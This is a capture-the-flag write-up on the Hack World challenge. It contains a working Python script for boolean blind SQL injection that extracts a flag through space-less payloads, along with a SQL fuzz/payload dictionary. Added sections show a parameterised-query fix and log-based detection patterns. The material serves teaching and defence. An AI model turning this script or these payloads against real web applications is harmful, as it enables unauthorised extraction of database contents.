BUUCTF WEB [CISCN2019 North Division Day2 Web1] Hack World

Opening the challenge, the hint suggests this is a SQL injection problem.
A quick test shows the injection produces no visible output, so we go straight to blind testing and construct a probe.
Constructed probes: with id = 1=(1)=1 and id = 1=(0)=1 the page displays differently.
So we can inject blind based on the page response. Next, fuzz the parameter to see what is filtered.
The fuzz results that come back as 482 are the filtered keywords.
OK: ascii is not filtered, and neither is substr. Spaces are filtered but can be replaced with parentheses; < and > are not filtered, and = is not either.
Write the script directly:
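To make the defender's side of this concrete, here is an added example (not part of the original writeup) that models the challenge in Python with an in-memory SQLite table: a request handler that applies a keyword/space blacklist of the kind the fuzzing suggests and then concatenates `id` into the query, next to a handler that uses a parameterised query. The blacklist, the table contents and the "Hello"/"Error" responses are assumptions modelled on the writeup; the two probes are the ones tested above. The blacklist stops `1 or 1=1` but not `1=(1)=1`, so the two probes still produce different responses, which is exactly the oracle a blind extraction script relies on; with the parameterised query both probes return the same page.

```python
import re
import sqlite3

# Constructed in-memory database standing in for the challenge's `flag` table.
# Table and column names come from the writeup; the row contents are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flag (id INTEGER, flag TEXT)")
    conn.execute("INSERT INTO flag VALUES (1, 'flag{constructed-sample}')")
    return conn

# Assumed keyword/space blacklist; the challenge's real filter is not on the page.
BLACKLIST = re.compile(r"\s|\bunion\b|\bor\b|\band\b|--|#|/\*", re.IGNORECASE)

# The two boolean probes used in the writeup.
PROBE_TRUE = "1=(1)=1"
PROBE_FALSE = "1=(0)=1"


def lookup_vulnerable(conn, user_id):
    """Blacklist filter plus string concatenation: the input becomes SQL."""
    if BLACKLIST.search(user_id):
        return "bad input"
    # `WHERE id = 1=(1)=1` parses as ((id = 1) = 1) = 1, so the expression the
    # attacker controls decides whether the row comes back.
    row = conn.execute(f"SELECT flag FROM flag WHERE id = {user_id}").fetchone()
    return "Hello" if row else "Error"


def lookup_hardened(conn, user_id):
    """Parameterised query: the input is only ever compared as a value."""
    row = conn.execute("SELECT flag FROM flag WHERE id = ?", (user_id,)).fetchone()
    return "Hello" if row else "Error"


def has_boolean_oracle(handler, conn):
    """True when the two probes are distinguishable by the response alone."""
    return handler(conn, PROBE_TRUE) != handler(conn, PROBE_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("blacklist blocks '1 or 1=1':", lookup_vulnerable(db, "1 or 1=1"))
    print("vulnerable handler has oracle:", has_boolean_oracle(lookup_vulnerable, db))
    print("hardened handler has oracle:", has_boolean_oracle(lookup_hardened, db))
```

The blacklist is the weak control here: it removes one way of writing the payload while leaving the SQL structure attacker-controlled, whereas the parameterised query removes the structure problem regardless of how the input is spelled.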

import requests
import sys
import string
import io

# Change the default encoding of standard output, otherwise s.text cannot be printed
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')

x = string.printable          # candidate characters for each position of the flag
flag = ""
url = "http://56039d8e-d2a3-4fc1-8195-3e18f2c1ea8c.node3.buuoj.cn/index.php"
payload = {
	"id": ""
}
# substr() positions start at 1; position 0 returns an empty string and never matches
for i in range(1, 60):
	for j in x:
		# Boolean-based blind probe: the page contains "Hello" when the comparison is true.
		# Parentheses stand in for the filtered spaces.
		payload["id"] = "1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)=1" % (str(i), ord(j))
		s = requests.post(url, data=payload)
		#print(s.text)
		if "Hello" in s.text:
			flag += j
			print(flag)
			break
	else:
		# No character matched at this position: the flag has ended
		break

print(flag)

Running the script yields the flag.
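From the detection side, the extraction loop above leaves a distinctive trace: many requests from one client whose `id` value has the same shape and differs only in the position and character numbers, with SQL keywords glued to parentheses because spaces are filtered. The following added example (not from the original writeup) scans constructed application log lines that record the `id` parameter, flags values written in the space-less `keyword(` form, and reports clients that repeat one request shape many times. The log format, timestamps and addresses are constructed for the example; the payload shapes are the ones from this writeup.

```python
import re
from collections import Counter, defaultdict

# Space-less SQL fragments: a keyword glued to an opening parenthesis, or a
# closing parenthesis glued to a keyword, which is how spaces were avoided above.
SPACELESS_SQL = re.compile(
    r"\((?:select|ascii|substr|group_concat)\(|\)(?:from|where|and|or)\(",
    re.IGNORECASE,
)

# Constructed application log: timestamp, client address, raw `id` parameter.
SAMPLE_LOG = """\
2019-12-13T10:00:00 10.0.0.5 id=1
2019-12-13T10:00:01 10.0.0.5 id=2
2019-12-13T10:00:02 203.0.113.9 id=1=(1)=1
2019-12-13T10:00:03 203.0.113.9 id=1=(0)=1
2019-12-13T10:00:04 203.0.113.9 id=1=(ascii(substr((select(flag)from(flag)),1,1))=102)=1
2019-12-13T10:00:04 203.0.113.9 id=1=(ascii(substr((select(flag)from(flag)),1,1))=103)=1
2019-12-13T10:00:05 203.0.113.9 id=1=(ascii(substr((select(flag)from(flag)),2,1))=108)=1
2019-12-13T10:00:06 10.0.0.7 id=42
"""

LINE_RE = re.compile(r"^(\S+) (\S+) id=(.*)$")


def parse_line(line):
    """Return (timestamp, client, id_value) or None for lines in another format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return m.group(1), m.group(2), m.group(3)


def normalise(value):
    """Replace digit runs by N so probes differing only in position/char collapse."""
    return re.sub(r"\d+", "N", value)


def analyse(log_text, threshold=3):
    """Flag space-less SQL values and clients repeating one non-numeric shape."""
    per_client = defaultdict(Counter)   # client -> Counter of normalised shapes
    flagged = []                        # (client, raw value) pairs
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        _, client, value = parsed
        if SPACELESS_SQL.search(value):
            flagged.append((client, value))
        per_client[client][normalise(value)] += 1
    # A plain numeric id normalises to "N"; anything else repeated `threshold`
    # times from one client looks like enumeration of an oracle.
    enumerating = sorted(
        client
        for client, shapes in per_client.items()
        if any(shape != "N" and count >= threshold for shape, count in shapes.items())
    )
    return {"flagged": flagged, "enumerating": enumerating}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for client, value in result["flagged"]:
        print("space-less SQL from", client, ":", value)
    print("clients enumerating:", result["enumerating"])
```

The signature match catches each payload on its own, while the shape counter catches the behaviour even if the keyword list is incomplete: a blind extraction needs many near-identical requests per character, so a single client sending the same non-numeric shape over and over stands out regardless of which keywords it used.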
SQL fuzz dictionary (my own collection; add anything that is missing yourself):

select
from
ascii
substr
table
column
by
schema
where
extractvalue
exp
if
/
(
)
%
!
@
#
$
^
&
*
-
_
+
=
'
"
~
`
\
|
,
.
||
&&
order
updatexml
limit
And
Or
%23
 
<
>
regex
group_concat
table_name
table_schema
column_name
database
information
union select
ascii(substr())
(select(group_concat(table_name))
from(information_schema.tables)where(table_schema=database())
(ascii(substr((select(group_concat(flaaag))from(flag)),%s,1))=%s)
where(table_schema=database())
Origin blog.csdn.net/qq_42967398/article/details/103517730